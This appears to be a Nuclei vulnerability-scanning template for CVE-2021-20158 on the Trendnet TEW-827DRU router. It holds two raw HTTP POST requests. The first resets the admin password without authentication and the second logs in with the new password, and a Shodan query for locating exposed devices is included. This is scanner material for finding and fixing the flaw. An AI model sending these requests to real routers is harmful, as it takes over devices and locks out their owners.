nuclei-templates/cves/2021/CVE-2021-20158.yaml

52 lines
1.6 KiB
YAML

id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-20158
cwe-id: CWE-287
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
requests:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'setConnectDevice'
- 'setInternet'
- 'setWlanSSID'
- 'TEW-827DRU'
condition: and
- type: word
part: header
words:
- "text/html"